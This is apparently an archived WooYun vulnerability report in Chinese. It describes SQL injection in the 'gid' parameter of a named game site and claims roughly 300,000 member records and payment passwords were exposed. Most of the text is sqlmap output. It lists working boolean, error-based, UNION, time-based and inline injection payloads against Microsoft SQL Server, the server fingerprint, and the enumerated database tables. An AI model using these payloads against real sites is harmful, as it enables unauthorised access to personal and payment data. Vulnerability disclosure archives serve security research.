乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-15: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-07-30: 厂商已经主动忽略漏洞,细节向公众公开
游戏族主站SQL注入泄漏30万会员信息及支付密码
http://www.zugame.com/xsk/?gid=249
28个库:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: gid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: gid=249 AND 4954=4954 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: gid=249 AND 2415=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (2415=2415) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(105)+CHAR(110)+CHAR(113))) Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: gid=-8823 UNION ALL SELECT CHAR(113)+CHAR(101)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(70)+CHAR(83)+CHAR(72)+CHAR(117)+CHAR(72)+CHAR(122)+CHAR(85)+CHAR(118)+CHAR(111)+CHAR(113)+CHAR(106)+CHAR(105)+CHAR(110)+CHAR(113),NULL-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: gid=-8764 OR 7099=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: gid=(SELECT CHAR(113)+CHAR(101)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (8403=8403) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(105)+CHAR(110)+CHAR(113))---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008Database: AccDB[54 tables]+-----------------------+| Account_tmp || CPS_Binding || D99_Tmp || Forum || GOpenList || GameList || Gllj || GuildLink || GuildUser || HFForum || LZCQ || New || PhoneBinding || SQL_Dir || SQL_Path || Settlement || ShouChong || T_Dict_AlignIllegal || T_Dict_AreaList || T_Dict_AuthTypeDefine || T_Dict_DefaultFace || T_Dict_GameType || T_Dict_IPData || T_Dict_IllegalWord || T_Dict_JobList || T_Dict_PartnerID || T_Dict_PartnerID || T_Dict_Question || T_FindPWD || T_IDCard || T_Partner_User || T_PhoneAuthByPwdReset || T_Queen_User || T_ReturnValue || T_SecretCard_Del || T_SecretCard_Del || T_UserDetails || T_UserGameInfo || T_UserKey || T_UserLoginError || T_UserOtherInfo || T_UserPayPWD || T_UserUpdEmailPush || T_Validate_Email || T_Validate_IDCardLog || T_Validate_IDCardLog || T_Validate_Moblie || T_ZCEMailSendHisory || T_ZCVipUser || XinShouKa || libao || pangolin_test_table || sccharge || shangcheng |+-----------------------+
34万会员信息:
34万支付密码:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)